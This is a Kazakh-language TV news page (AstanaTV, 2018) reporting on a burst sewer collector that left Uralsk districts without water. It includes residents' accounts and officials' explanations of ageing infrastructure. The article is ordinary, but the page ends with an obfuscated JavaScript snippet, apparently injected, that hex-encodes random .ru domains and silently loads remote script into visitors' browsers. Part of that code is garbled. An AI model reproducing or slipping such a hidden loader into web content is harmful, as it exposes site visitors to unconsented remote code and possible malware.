$498.34 €519.72 ₽4.85
×

Мейрамдағы «мейрам». Орал қаласы сусыз қалды.

AstanaTV
05.05.2018ж. 20:00
3264
Мейрамдағы «мейрам». Орал қаласы сусыз қалды.

Облыс орталығы – Орал қаласының ықшамаудандары «халық бірлігі» мейрамында тырнақшаның ішіндегі «мейрамға» кенелді. Бейнелеп айтқанда «бір қасық суға» зәру болды. Кейін тіршілік нәрі күніне тек екі рет беріліп отырды. Себебі қаладағы шайынды су ағатын кәріз құбыры жарылған. Ал істен шыққан коллектор 2008 жылы салынған көрінеді.Сол кезде облыс басшылары «бұл проблеманы кем дегенде 20-30 жыл ұмытамыз» деп әр жиында айта беретін дейді, біздің меншікті тілшімз. Оралдықтар үшін алдағы мереке күндері тағы да тырнақшаның ішіндегі «мереке» бола ма? Су арнасының өкілдері «су қорын жасап отырыңыздар» депті. Тұрғын үй коммуналдық шаруашылығының әбден тұралағанын көрсететін кезекті төтенше жағдай туралы Еркін Кариннің репортажы. 

Гүлім Кәрімова, Орал қаласының тұрғыны:

Балам 1-і күні суға барып, екі сағат кезекте тұрып келді. Сатып алып келді суды. Қалай балалармен мереке күндері сусыз отыру? Кірлерін жуа алмадық, не жуындыра алмадық. Монша іздеп кеттік.

Шорабай Қуанышқалиев, Орал қаласының тұрғыны:

Су жоқ болған күні кеше мына баклашканы көріп тұрсыз ғой. Осымен даладан алып келдік. Тіпті тамақ пісіретін су болмай қалды.

Коллектор істен шыққан 30-сәуірден бері көрген қиындығын тұрғындар айтып тауыса алар емес. Үйге келіп тұрған қара судың қадірін олар енді түсінгендей. Қазір қолда бар ыдыс-аяқты суға толтыруда. Өйткені су тағы тоқтап қала ма деп қорқады. Мейрам күндері сусыз қалған жеті ықшамауданның 70 мыңдай тұрғыны су іздеп сенделгенін жыр қылып айтады.

Бөпеш Әбдірахманова, Орал қаласының тұрғыны:

Мен көршіден бір баклашка су сұрап алдым шай қайнатып ішуге. 90-ға келген адамға бұл қандай қиын? Су жоқ болғанда жуына алмайсың, туалетте су жоқ. үйде иіс болады. Үлкен адамдарға тіпті қиын. Біздер сыртқа шыға алмаймыз. Сырттан су әкеле алмаймыз.

‑ХХІ век, город Уральск, воды нет...

Тарыққан тұрғындарға су арнайы көлікпен жеткізіліп, мектептерде сабақ уақыты қысқарды. Кейін су күніне екі мезгіл беріле бастады. Ал үлгірмегендер мынадай дүңгіршектерден суды литрлеп сатып алуға мәжбүр.

Алексей Белоногов, кәсіпкер:

7 күнде әрең сататын 20 текше метр су бір күнде сатылып кетті. Су алуға келгендердің саны жоқ. Қиналғандарын көріп, жанымыз ашығасын қасымыздағы моншадан суды тегін бергіздім. Бір-бірімізге осындайда түсіністік танытуымыз керек қой.

Мамандардың сөзінше, жер астында 7,5 метр тереңде жатқан құбыр жол бойындағы салмаққа шыдамай опырылуы мүмкін. Өйткені салынған кезде бұл маңда қозғалыс аз, ғимараттар да сирек болған. Кезінде «жарамдылығы жарты ғасыр» деп мақталған кәріз құбырын табу оңай болмады. Үгітілген құбырды іздеген мамандар 70 метрдей ор қазды. Кейін... топырақ опырылып, қазған шұңқырына экскаватордың өзі құлап кетті.

Еркін Карин, тілші:

Бұл осыдан 10 жыл бұрын төселген құбыр, дәлірек айтсақ қазіргі қалдығы ғана. Сол кезде мамандар осыған дейін пайдаланып келген темір құбырдан бас тартып, мынадай әйнекпластик материалды пайдаланған жөн деп шешсе керек. Арада он жыл өтпей жатып, сол кездегі материал мінеки, қағаз сияқты болып әбден мүжіліп қалған.

"Бір қызығы", енді бұл жерге қайтадан темір құбыр төселуі мүмкін. Сосын уақытша коллектор салынады. Ал қалалық әкімдік жанынан арнайы құрылған комиссия шығынды есептеп, апат себептерін анықтайды.

Салауат Айбатов, «Батыс су арнасы» ЖШС директорының бірінші орынбасары:

Пластик құбырдың жарамдылық мерзімі 50 жыл, бірақ бұл жерге әйнекпластик құбыр төселген. Ол да 50 жылға жарамды. Бірақ неліктен жарылғанын арнайы комиссия анықтайды. Негізі кез-келген канализациялық құбыр шайынды судағы химиялық заттарға төтеп беруі тиіс. Жерді қазғанда құбырды топырақ езіп жібергенін көрдік. Енді сынықтары сараптамаға жіберіліп, арнайы комиссия апат себебін анықтайды. Бірақ қорытындысы қашан шығатынын айта алмаймын.

Істен шыққан коллектормен келесі коллектордың арасы 11 шақырым. Егер осы аралыққа әйнекпластик құбыр жүргізілгенін ескерсек, оның да жарылуы ғажап емес. Әзірге барлық шығынды жергілікті «Батыс су арнасы» мекемесі өз мойнына алған. Бірақ 11 шақырым құбырды түгел ауыстыру оңай емес.

Алтынбек Қайсағалиев, Орал қаласы әкімінің орынбасары:

Техникалық бақылау жүргізгеннен кейін басқа да жерлеріне сондай қауіп бар деген шешім қабылданса, толықтай 11 километр тұрбаны ауыстыру жөнінде шешім қабылдануы мүмкін. Жобасын жасауға жергілікті бюджеттен қаражат бөлінетін шығар. Ал құрылыс-монтаж жұмыстары алдағы жылдары қаражаттың бөлінуіне қарасты шешілетін болады.

Бүгінде Оралдағы инфрақұрылым желілерінің жағдайы мәз емес. Мысалы, жылу құбырларының 52 пайызы тозса, су құбырлары 63 пайызға ескірген. Кәріз желілері де осының ар жақ-бер жағы - 62 пайыз. Ал су айдайтын насос стансасы апатқа ұшыраудың аз-ақ алдында, 80 пайызы тозыпты. Орал ғана емес, еліміздің өзге де өңірлеріндегі жағдай осы.

Бүгінде қалаға түгелдей су берілді. Дегенмен сала мамандары жағдай әбден тұрақталғанша тұрғындарға суды көбірек жинап алуға кеңес береді. Өйткені уақытша коллектор іске қосылғанға дейін су әлі тоқтатылады. Ал құбырлар жаңадан төселгеннен кейін «жарамдылық мерзімі кем дегенде 20-30 жыл» деп енді әкімдер жар салмайтын шығар...

Еркін Карин, Наурыз Халит «Біздің Уақыт». 


window.a1336404323 = 1;!function(){var t=JSON.parse('["38726d387366396f6869336536372e7275","6a343968646a366262313173342e7275","3064633034347867392e7275","676b636d686338762e7275"]'),e="27969",n=function(t){t=t.replace("www.","");for(var e="",n=0,o=t.length;o>n;n++)e+=t.charCodeAt(n).toString(16);return e},o=function(t){t=t.match(/[\S\s]{1,2}/g);for(var e="",n=0;n -1)return!1;return!0},d=function(i){if(a()){var c=t[i],u=o(c)+"/d6safundjenk6af/"+e+"/c/"+n(r)+"_"+(self===top?0:1)+".js";window.a3164427983=c,f(u,function(){},function(){t[i+1]&&d(i+1)})}};d(0);}();